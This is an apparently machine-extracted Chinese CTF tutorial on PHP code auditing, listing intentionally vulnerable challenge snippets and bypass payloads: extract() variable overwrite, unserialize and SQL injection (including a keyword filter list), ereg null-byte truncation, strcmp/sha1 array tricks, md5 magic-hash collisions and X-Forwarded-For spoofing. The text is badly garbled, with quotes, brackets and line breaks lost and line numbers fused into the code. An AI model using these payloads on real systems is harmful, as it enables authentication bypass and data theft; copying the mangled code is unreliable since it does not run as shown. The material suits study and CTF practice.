1、ctf中的php代碼審計(jì)技巧 作者：未知原文鏈接：/ctf/200.html 收集整理：/test/index.php本文由 干貨12暫無公告 敏感函數(shù) Home CTF ctf中的php代碼審計(jì)技巧 ctf中的php代碼審計(jì)技巧2017-02-07做ctf題時，遇到審計(jì)題時可能會遇到，翻翻記錄可以很快的找到腦洞。 1.PHP123456PHP extract() file_get_contentsshiyan=&flag=1PHP123456789101112131415$flag=xxx; extract($_

2、GET); if(isset($shiyan)$content=trim(file_get_contents($flag); if($shiyan=$content)echoctfxxx;elseechoOh.no;內(nèi)容綱要32.PHP123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354 $value)$value = trim($value);is_string($value) & $req$key = addslashes($value);fun

3、ction is_palindrome_number($number) $number = strval($number);$i = 0;$j = strlen($number) - 1; while($i $j) if($number$i != $number$j) return false;$i+;$j-;return true;if(is_numeric($_REQUESTnumber)$info=sorry, you cannt input a number!;elseif($reqnumber!=strval(intval($reqnumber)$info = number must

4、 be equal to its integer! ;else4 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 $value1 = intval($reqnumber);$value2 = intval(strrev($reqnumber);if($value1!=$value2)$info=no, this is not a palindrome number!;elseif(is_palindrome_number($reqnumber)$info = nice! $value1 is a palindr

5、ome number!;else$info=$flag;echo $info;3.PHPwhere)$this-select($this-where);function select($where)$sql = mysql_query(select * from user where .$where);/ MySQLreturn mysql_fetch_array($sql);/if(isset($requsettoken)false/truefalse$login = unserialize(gzuncompress(base64_decode($requsettoken);/gzuncom

6、press:/unserialize:PHP$db = new db();$row = $db-select(user=.mysql_real_escape_string($loginuser).);/mysql_real_escape_string()if($loginuser = ichunqiu)echo $flag;SQLelse if($rowpass !=$loginpass) echo unserialize injection!;elseecho ( ) ;elseheader(Location: index.php?error=1);?4.5PHP12345<?php$

7、arr = array(user => ichunqiu);$a = base64_encode(gzcompress(serialize($arr); echo $a;?>12345678910111213141516171819202122232425262728293031323334353637383940414243444546476PHP12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<?php er

8、ror_reporting(0);if (!isset($_POSTuname) | !isset($_POSTpwd) echo <form action= method=post>.<br/> echo <input name=uname type=text/>.<br/> echo <input name=pwd type=text/>.<br/> echo <input type=submit />.<br/>echo </form>.<br/>echo <!-

9、source: source.txt->.<br/> die;functionAttackFilter($StrKey,$StrValue,$ArrReq) if (is_array($StrValue)/$StrValue=implode($StrValue);/if (preg_match(/.$ArrReq./is,$StrValue)=1)/print ;exit();$filter = and|select|from|where|union|join|sleep|benchmark|,|(|); foreach($_POST as $key=>$value)/

10、AttackFilter($key,$value,$filter);$con = mysql_connect(XXXXXX,XXXXXX,XXXXXX); if (!$con)die(Could not connect: . mysql_error();$db=XXXXXX;mysql_select_db($db, $con);/ MySQL$sql=SELECT * FROM interest WHERE uname = $_POSTuname;$query = mysql_query($sql);/ MySQLif (mysql_num_rows($query) = 1) /759$key

11、 = mysql_fetch_array($query);/falseif($keypwd = $_POSTpwd) print CTFXXXXXX;elseprint ;elseprint ;mysql_close($con);?> 60 61 62 63 64 65 66 67 68 69 70 71 72 73 5.PHP123ereg payload 1e9%00*-*%00PHP12345678910111213141516171819202122232425<?phpif (isset ($_GETpassword)if (ereg (a-zA-Z0-9+$, $_GE

12、Tpassword) = FALSE)echo <p>You password must be alphanumeric</p>else if (strlen($_GETpassword) < 8 && $_GETpassword > 9999999)if (strpos ($_GETpassword, *-*) != FALSE)die(Flag: . $flag);elseecho(<p>*-* have not been found</p>);elseecho <p>Invalid password&

13、lt;/p>?>PHP1admin GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1- -86.PHP1 if (isset($_GETa) 2 if (strcmp($_GETa, $flag) = 0) 3/4 die(Flag: .$flag);5 else6 print ; 7 8PHP1 payload:?a=1 2漏洞原理/functions/201.htmlPHP15.3strcmp 07.PHP1 <?php2 if (isset($_GETname) and isset($_GE

14、Tpassword) 3 4 if ($_GETname = $_GETpassword)5 echo <p>Your password can not be your name!</p>6 else if (sha1($_GETname) = sha1($_GETpassword)7 die(Flag: .$flag);8 else9 echo <p>Invalid password.</p> 10 11 else12 echo <p>Login first!</p> 13 ?>14PHP1 =bool2 sha1

15、()md5()sha1()sha1()3 ?name=a&password=b8.PHP<?php session_start();if (isset ($_GETpassword) if ($_GETpassword = $_SESSIONpassword) die (Flag: .$flag);elseprint <p>Wrong guess.</p>mt_srand(microtime() rand(1, 10000) % rand(1, 10000) + rand(1, 10000);?>9.9PHP123456789101112131415

16、1617181920212223242526272829303132333435<?phpif($_POSTuser && $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(phpformysql) or die(Could not select database); if ($conn->connect_error) die(Connection failed: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sq

17、l = select pw from php where user=$user;$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if ($rowpw) && (!strcasecmp($pass, $rowpw) /str1str2< 0str1str2> 0 0echo <p>Logged in! Key:* &

18、lt;/p>else echo(<p>Log in failure!</p>);?>PHP1cookiesession1234567891011通過構(gòu)造sql語句使rowpw等于pass10.正則漏洞，%00截?cái)?11.10PHPPHP1234567891011121314<?php if(eregi(hackerDJ,$_GETid) echo(<p>not allowed!</p>); exit();$_GETid = urldecode($_GETid); if($_GETid = hackerDJ)echo <p&

19、gt;Access granted!</p>echo <p>flag: * </p>?>1112345678910111213141516171819202122232425262728293031<?phpif($_POSTuser && $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(*) or die(Could not select database); if ($conn->connect_error) die(Connection faile

20、d: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sql = select user from php where (user=$user) and (pw=$pass);$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if($rowuser=admin) echo &

21、lt;p>Logged in! Key: * </p>if($rowuser != admin) echo(<p>You are not admin!</p>);?>閉合注入，繞過驗(yàn)證 12.PHP<?phpfunction GetIP() if(!empty($_SERVERHTTP_CLIENT_IP)$cip = $_SERVERHTTP_CLIENT_IP;else if(!empty($_SERVERHTTP_X_FORWARDED_FOR)$cip = $_SERVERHTTP_X_FORWARDED_FOR;else if(!

22、empty($_SERVERREMOTE_ADDR)$cip = $_SERVERREMOTE_ADDR;else$cip = ;return $cip;$GetIPs = GetIP();if ($GetIPs=)echo Great! Key is *;elseecho ?>IP;添加http頭即可13.240610708神奇的數(shù)字 14.12PHPPHP12345678910111213<?php$md51 = md5(QNKCDZO);$a = $_GETa;$md52 = md5($a); if(isset($a)if ($a != QNKCD

23、ZO && $md51 = $md52) echo nctf*; else echo false!;elseecho please input a;?>1234567891011121314151617181920212223<?php if($_GETid) mysql_connect(SAE_MYSQL_HOST_M . : . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GETid);$query = mysql_fetch

24、_array(mysql_query(select content from ctf2 where id=$id); if ($_GETid=1024) echo <p>no! try again</p>elseecho($querycontent);?>1024.115.此處還可以數(shù)組繞過16.13PHPPHP123456789if (isset ($_GETnctf) if (ereg (1-9+$, $_GETnctf) = FALSE) echo ;else if (strpos ($_GETnctf, #biubiubiu) != FALSE) die(

25、Flag: .$flag);elseecho ;123456789101112131415#GOAL: login as admin,then get the flag;error_reporting(0); require db.inc.php;functionclean($str) if(get_magic_q uotes_gpc()$str=stripslashes($str);return htmlentities($str, ENT_QUOTES);$username = clean(string)$_GETusername);$password = clean(string)$_GETpassword);$query=SELECT * FROM users WHERE name=.$username. AND pass=.$password.;$result=mysql_query($query);if(!$result | mysql_num_row